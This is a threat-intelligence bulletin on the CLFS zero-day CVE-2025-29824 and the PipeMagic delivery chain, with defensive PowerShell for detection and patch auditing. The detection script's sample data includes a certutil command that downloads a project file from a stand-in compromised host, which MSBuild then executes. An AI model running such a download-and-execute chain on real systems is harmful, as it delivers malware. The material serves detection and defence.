Exploitation of CLFS Zero-Day Leads to Ransomware Activity.

Summary:
Microsoft has patched a zero-day elevation of privilege vulnerability, CVE-2025-29824, in the Windows Common Log File System (CLFS) driver that was being actively exploited in a small number of targeted ransomware attacks. The activity, tracked as the threat cluster Storm-2460, affected organizations in the IT and real estate sectors in the United States, the financial sector in Venezuela, a software company in Spain, and the retail sector in Saudi Arabia. Exploiting the flaw allowed the attackers to gain SYSTEM privileges on the compromised hosts.

The threat actors used PipeMagic, a plugin-based trojan first observed in 2022 and delivered via a malicious MSBuild file, to deploy both the exploit and the ransomware payload. The initial access vector is unknown, but the attackers were observed using the certutil utility to download the malware from a legitimate third-party site that had been compromised. This is the second Windows zero-day delivered via PipeMagic, after CVE-2025-24983, and PipeMagic was also used in Nokoyawa ransomware attacks that exploited an earlier CLFS zero-day, CVE-2023-28252. The exploit for CVE-2025-29824 relies on memory corruption and uses the RtlSetAllBits API to enable all privileges on the exploit process's token, which lets it inject into SYSTEM processes; credential extraction and file encryption followed shortly afterwards. Microsoft could not obtain a sample of the ransomware itself, but the ransom note contained a TOR domain linked to the RansomEXX ransomware family. Windows 11, version 24H2 is not affected by the observed exploitation, although the vulnerability is present and the update is still required.
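The delivery chain above (certutil fetching a file from a remote site, then MSBuild executing it) is something defenders can hunt for directly. The script below is an added example, not code from the Microsoft report, and runs over constructed process-creation records whose field names follow Sysmon Event ID 1. The hostnames, users, URL, paths and the certutil switches in the sample records are assumptions made for illustration; the report only states that certutil was used to download the malware.

```powershell
# Added detection example (not from the Microsoft report): flag certutil downloads from
# remote sites, MSBuild runs from user-writable paths, and the pairing of the two.
# The records below are constructed; URL, user, host and paths are invented.

$events = @(
    [pscustomobject]@{ Time='2025-04-01T09:58:12Z'; User='CORP\jdoe'; Image='C:\Windows\System32\certutil.exe'
                       CommandLine='certutil.exe -hashfile C:\Users\jdoe\Downloads\setup.exe SHA256' }
    [pscustomobject]@{ Time='2025-04-01T10:00:01Z'; User='CORP\jdoe'; Image='C:\Windows\System32\certutil.exe'
                       CommandLine='certutil.exe -urlcache -split -f https://compromised-site.example/upload/build.xml C:\Users\Public\build.xml' }
    [pscustomobject]@{ Time='2025-04-01T10:00:07Z'; User='CORP\jdoe'; Image='C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe'
                       CommandLine='MSBuild.exe C:\Users\Public\build.xml' }
    [pscustomobject]@{ Time='2025-04-01T11:15:40Z'; User='CORP\build'; Image='C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe'
                       CommandLine='MSBuild.exe C:\src\inventory\inventory.sln /p:Configuration=Release' }
)

function Find-CertutilMsbuildChain {
    param([Parameter(Mandatory)][object[]]$Events)

    $findings   = [System.Collections.Generic.List[object]]::new()
    $downloaded = @{}   # lower-cased destination path -> the certutil event that wrote it
    # Assumption: typical drop locations for a downloaded project file
    $writablePaths = '\\(Users\\Public|ProgramData|Windows\\Temp|AppData\\Local\\Temp)\\'

    foreach ($e in $Events) {
        $image = ($e.Image -split '\\')[-1].ToLowerInvariant()
        $argv  = @($e.CommandLine -split '\s+' | Select-Object -Skip 1)

        if ($image -eq 'certutil.exe' -and $e.CommandLine -match 'https?://\S+') {
            # certutil writes the downloaded file to its last argument
            $dest = $argv[-1]
            $downloaded[$dest.ToLowerInvariant()] = $e
            $findings.Add([pscustomobject]@{ Time=$e.Time; User=$e.User
                Rule='certutil download from remote site'; Detail="$($Matches[0]) -> $dest" })
        }
        elseif ($image -eq 'msbuild.exe') {
            # the project file is the first argument that is not a switch
            $project = @($argv | Where-Object { $_ -notmatch '^[/-]' })[0]
            if ($project -and $project -match $writablePaths) {
                $rule = 'MSBuild running a project from a user-writable path'
                if ($downloaded.ContainsKey($project.ToLowerInvariant())) {
                    $rule = 'MSBuild executing a file just fetched by certutil (PipeMagic-style delivery)'
                }
                $findings.Add([pscustomobject]@{ Time=$e.Time; User=$e.User; Rule=$rule; Detail=$project })
            }
        }
    }
    return $findings
}

# On the sample data this reports the certutil download and the correlated MSBuild run;
# the hash check and the build-server MSBuild invocation are not flagged.
Find-CertutilMsbuildChain -Events $events | Format-Table -AutoSize
```

The tokenizer splits on whitespace, so quoted paths containing spaces need a proper command-line parser before the same logic applies; in production, feed the function from Sysmon or Defender process-creation telemetry rather than the inline sample, and treat the correlated rule as high confidence and the two standalone rules as hunting leads.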

Security Officer Comments:
The targeting of specific sectors across different geographical regions indicates a sophisticated and deliberately targeted campaign. The connection to the RansomEXX ransomware family suggests that Storm-2460 is financially motivated. The failure of this particular exploit against the latest version of Windows (11, version 24H2) illustrates the security benefit of keeping systems current. Organizations should prioritize applying the April 2025 Microsoft Patch Tuesday update to mitigate CVE-2025-29824 and remain vigilant for activity indicative of PipeMagic or similar malware. The continued use of CLFS zero-days in ransomware attacks warrants sustained attention from defenders.

Suggested Corrections:
IOCs are available in the Microsoft blog post linked below.

Microsoft released security updates addressing CVE-2025-29824 on April 8, 2025. Customers running Windows 11, version 24H2 are not affected by the observed exploitation, even though the vulnerability is present on that version. Microsoft urges customers to apply the updates as soon as possible.

Microsoft recommends the following mitigations to reduce the impact of activity associated with Storm-2460:

  • Refer to Microsoft's blog post Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself for robust measures to defend against ransomware.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
  • Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint. Ransomware attackers often identify unmanaged or legacy systems and use these blind spots to stage attacks.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn't detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. Use Microsoft Defender Vulnerability Management to assess your current status and deploy any updates that might have been missed.
  • Microsoft 365 Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks:
      • Use advanced protection against ransomware
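Several of the items above can be checked locally on a host. The script below is an added audit example, not part of the Microsoft advisory, and reports the update-related facts and the two mitigations that Get-MpPreference exposes. It assumes that Windows 11 24H2 corresponds to OS build 26100 and that the ASR rule "Use advanced protection against ransomware" has the ID c1db55ab-c21a-4637-bb3f-a12568109d35; because the KB number for the April 2025 update differs per OS version, it uses the release date as a proxy and reports the clfs.sys file version for comparison rather than hard-coding a fixed version.

```powershell
# Added audit example (not from the Microsoft advisory). Run in an elevated PowerShell session.
# Assumptions: Windows 11 24H2 = OS build 26100; ASR rule "Use advanced protection against
# ransomware" = c1db55ab-c21a-4637-bb3f-a12568109d35; updates installed on or after 2025-04-08
# are used as a proxy for the April 2025 patch because KB numbers vary by OS version.

$RansomwareAsrRuleId = 'c1db55ab-c21a-4637-bb3f-a12568109d35'
$Win11_24H2_Build    = 26100
$PatchReleaseDate    = Get-Date '2025-04-08'

function Get-Clfs29824Posture {
    $os    = Get-CimInstance Win32_OperatingSystem
    $build = [int]$os.BuildNumber
    $clfs  = Get-Item "$env:SystemRoot\System32\drivers\clfs.sys"
    $recentUpdates = @(Get-HotFix | Where-Object { $_.InstalledOn -and $_.InstalledOn -ge $PatchReleaseDate })

    $mp  = Get-MpPreference
    $ids = @($mp.AttackSurfaceReductionRules_Ids | ForEach-Object { $_.ToLower() })
    $idx = [array]::IndexOf($ids, $RansomwareAsrRuleId)
    $asrAction = if ($idx -ge 0) { [int]$mp.AttackSurfaceReductionRules_Actions[$idx] } else { 0 }

    $cloud = switch ([int]$mp.MAPSReporting) { 0 {'Disabled'} 1 {'Basic'} 2 {'Advanced'} default {"Unknown($_)"} }
    $asr   = switch ($asrAction)               { 1 {'Block'} 2 {'Audit'} 6 {'Warn'} default {'NotConfigured'} }

    # EDR in block mode and automated investigation/remediation are tenant settings in the
    # Defender portal and are not visible through Get-MpPreference, so they are not reported here.
    [pscustomobject]@{
        ComputerName           = $env:COMPUTERNAME
        OsBuild                = $build
        ObservedExploitBlocked = ($build -ge $Win11_24H2_Build)   # 24H2 resists the observed exploit; the bug still needs the update
        ClfsSysVersion         = $clfs.VersionInfo.FileVersion     # compare with the April 2025 update for this OS version
        UpdatesSinceApril8     = ($recentUpdates | ForEach-Object { $_.HotFixID }) -join ','
        CloudProtection        = $cloud
        RansomwareAsrRule      = $asr
    }
}

$posture = Get-Clfs29824Posture
$posture | Format-List

if (-not $posture.UpdatesSinceApril8) {
    Write-Warning 'No updates installed since 2025-04-08; confirm the April 2025 cumulative update is present.'
}
if ($posture.CloudProtection -ne 'Advanced') {
    Write-Warning 'Enable cloud-delivered protection: Set-MpPreference -MAPSReporting Advanced'
}
if ($posture.RansomwareAsrRule -ne 'Block') {
    Write-Warning "Enable the ASR rule: Add-MpPreference -AttackSurfaceReductionRules_Ids $RansomwareAsrRuleId -AttackSurfaceReductionRules_Actions Enabled"
}
```

The script only reports and suggests commands; apply the Set-MpPreference and Add-MpPreference changes through your normal configuration management rather than ad hoc on each host, and treat the "updates since April 8" column as a prompt to verify, not as proof that the CLFS fix is installed.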

Link(s):
https://www.microsoft.com/en-us/security/blog/2025/04/08/exploitation-of-clfs-zero-day-leads-to-ransomware-activity/

https://www.bleepingcomputer.com/news/security/microsoft-windows-clfs-zero-day-exploited-by-ransomware-gang/